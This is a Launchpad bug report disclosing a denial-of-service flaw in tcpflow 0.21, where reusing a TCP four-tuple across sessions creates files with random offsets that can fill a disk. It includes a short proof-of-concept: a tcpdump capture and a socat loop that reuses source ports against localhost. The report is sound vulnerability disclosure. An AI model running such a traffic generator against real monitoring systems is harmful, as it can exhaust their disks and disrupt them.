DOS vulnerability tcpflow

Bug #256122 reported by Gerard Wagener
260
This bug affects 1 person
Affects Status Importance Assigned to Milestone
tcpflow (Ubuntu)
Confirmed
Undecided
Unassigned

Bug Description

Binary package hint: tcpflow

Ubuntu 7.10
tcpflow version: 0.21-11

In case the same source IP and source port and destination IP and destination port is reused during one capture (pcap file), tcpflow put all these TCP sessions in a single file even if they belong to different TCP sessions. With the next initial sequence number in the nth TCP session (n>1) a random offset in the file is created. An attacker might generate n sessions using the same source IP, source port and destination IP and destination port and cause random offsets. One file created by tcpflow can get a size until 2GB. If an attacker performs this TPC session generation with various port numbers the disk can be easily filled or the application that is using the output of tcpflow can run into trouble. Like in the ZIP bomb attack only a few packets are needed to perform this attack.

Proof of concept

tcpdump -i lo -s0 -w test.pcap

i=1235
while [ 1 ]; do
   j=0
  while [ $j -lt 5 ]; do
      cat req.txt | socat - tcp:localhost:80,sourceport=$i,reuseaddr
      sleep 1
      let j=$j+1
  done
let i=$i+1
done

Hit CTRL+c after a while and launch tcptrace on test.pcap

Kees Cook (kees)
Changed in tcpflow:
status: New → Confirmed
To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.